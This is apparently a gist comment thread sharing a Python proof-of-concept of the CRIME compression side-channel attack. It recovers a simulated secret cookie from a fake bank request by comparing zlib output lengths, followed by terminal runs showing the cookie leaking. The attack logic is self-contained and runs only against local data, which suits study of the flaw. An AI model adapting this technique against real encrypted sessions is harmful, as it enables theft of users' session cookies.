It's not a crime to build a CRIME

crime.py

# This is supposedly what CRIME by Juliano Rizzo and Thai Duong will do
# Algorithm by Thomas Pornin, coding by xorninja, improved by @kkotowicz
# http://security.blogoverflow.com/2012/09/how-can-you-protect-yourself-from-crime-beasts-successor/

import string
import zlib
import sys
import random

charset = string.letters + string.digits + "%/+="

COOKIE = ''.join(random.choice(charset) for x in range(30))

HEADERS = ("POST / HTTP/1.1\r\n"
       "Host: thebankserver.com\r\n"
           "Connection: keep-alive\r\n"
           "User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/22.0.1207.1 Safari/537.1\r\n"
           "Accept: */*\r\n"
           "Referer: https://thebankserver.com/\r\n"
           "Cookie: secret=" + COOKIE +  "\r\n"
           "Accept-Encoding: gzip,deflate,sdch\r\n"
           "Accept-Language: en-US,en;q=0.8\r\n"
           "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3\r\n"
           "\r\n")

BODY = ("\r\nCookie: secret="
         )

BODY_SUFFIX=("\r\n"
           "Accept-Encoding: gzip,deflate,sdch\r\n"
           "Accept-Language: en-US,en;q=0.8\r\n"
           "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3\r\n"
           "\r\n")

cookie = ""

def compress(data):

    c = zlib.compressobj()
    return c.compress(data) + c.flush(zlib.Z_SYNC_FLUSH)

def findnext(b,bs,charset):
    original_length = len(compress(HEADERS + b + bs))
    lengths = []
    for c in charset:
        length = len(compress(HEADERS +
                      b +
                      c +
                      bs))

        lengths.append((c, length))

    min_length = min(_[1] for _ in lengths)
    possible_chars = [_[0] for _ in filter(lambda _: _[1] == min_length, lengths)]
    return possible_chars

def exit():
    print "Original cookie: %s" % COOKIE
    print "Leaked cookie  : %s" % cookie
    sys.exit(1)

    
def forward():
    global cookie
    while len(cookie) < len(COOKIE):
        chop = 1
        possible_chars = findnext(BODY + cookie, "", charset)
        body_tmp = BODY
        orig = possible_chars
        while not len(possible_chars) == 1:
            if len(body_tmp) < chop:
                #print "stuck at", possible_chars
                return False

            body_tmp = body_tmp[chop:]
            possible_chars = findnext(body_tmp + cookie, "", orig)

        cookie = cookie + possible_chars[0]
    return True

while BODY.find("\r\n") >= 0:
    
    if not forward():
        cookie = cookie[:-1]
    
    if len(cookie) >= len(COOKIE):
        exit()
    print "reducing body"
    BODY = BODY[BODY.find("\r\n") + 2:]

exit()

That's how I started, but I had mixed results with the body shortened, same with your script:

kotomb:gist3698401-5d2a00a6d2a730c976cfd934c810273e384744f8 koto$ python crime.py
Original cookie: i69ZmP8FQsKdav5F7Y7A+8N9TDq%5B
Leaked cookie : i69ZmP8FQsKdav5F7Y7A+8N9TDq%5B
kotomb:gist3698401-5d2a00a6d2a730c976cfd934c810273e384744f8 koto$ python crime.py
reducing body
Original cookie: QoOQUSX6Tww9Cl8YMGr9MdYxy3kpVZ
Leaked cookie : Qo
kotomb:gist3698401-5d2a00a6d2a730c976cfd934c810273e384744f8 koto$ python crime.py
Original cookie: G4xbSyl%8R43i1q0o3jDtDmyPVXrtV
Leaked cookie : G4xbSyl%8R43i1q0o3jDtDmyPVXrtV
kotomb:gist3698401-5d2a00a6d2a730c976cfd934c810273e384744f8 koto$ python crime.py
Original cookie: txA7GVLs2UXSP1B8KL2uibAgXXGE%k
Leaked cookie : txA7GVLs2UXSP1B8KL2uibAgXXGE%k
kotomb:gist3698401-5d2a00a6d2a730c976cfd934c810273e384744f8 koto$ python crime.py
reducing body
Original cookie: ipypF02hb1t7//G0Yx099mUNKU/Bx6
Leaked cookie : i4ee
kotomb:gist3698401-5d2a00a6d2a730c976cfd934c810273e384744f8 koto$ python crime.py
reducing body
Original cookie: eD2Mxfol4X1jddetaFn9QQvRXCE89A
Leaked cookie : eD2N

with longer body it practically detects the whole cookie everytime.